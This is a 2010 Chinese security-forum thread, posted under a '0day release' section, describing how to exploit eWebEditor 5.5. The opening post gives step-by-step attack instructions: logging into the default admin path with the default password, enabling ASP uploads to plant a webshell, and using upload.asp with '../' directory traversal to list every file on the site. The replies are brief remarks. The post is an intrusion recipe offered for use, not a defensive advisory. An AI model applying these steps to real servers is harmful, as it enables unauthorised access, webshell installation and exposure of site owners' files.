【3.A.S.T】网络安全爱好者 » 0day发布 » Ewebeditor 5.5 列目录漏洞利用方法

返回列表发帖

[3.A.S.T]内部成员

Rank: 9 Rank: 9 Rank: 9

帖子: 253
积分: 742
威望: 1111
金钱: 841
在线时间: 30 小时

管理组成员

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2010-6-22 14:51 | 只看该作者

Ewebeditor 5.5 列目录漏洞利用方法

Ewebeditor, 漏洞, 目录

发布时间：2010-01-11

影响版本：Ewebeditor 5.5

发布作者：udb311 from 黑白前线

漏洞描述：

利用方法1：

后台登录：ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin

添加上传类型asp，调用用样式上传页ewebeditor/ewebeditor.htm?id=body&style=popup直接上传asp大马。

利用方法2：

进入后台，ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录

ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录

可遍历网站所有目录文件。

3.A.S.T士兵

Rank: 1

帖子: 32
积分: 37
威望: 33
金钱: 43
在线时间: 2 小时

2楼

发表于 2010-6-23 09:10 | 只看该作者

这个我看过

3.A.S.T士兵

Rank: 1

帖子: 32
积分: 37
威望: 33
金钱: 43
在线时间: 2 小时

3楼

发表于 2010-6-23 09:15 | 只看该作者

这个我看过

3.A.S.T士兵

Rank: 1

帖子: 3
积分: 3
威望: 3
金钱: 13
在线时间: 0 小时

4楼

发表于 2010-6-24 00:24 | 只看该作者

5.5版本还没见过了
有待测试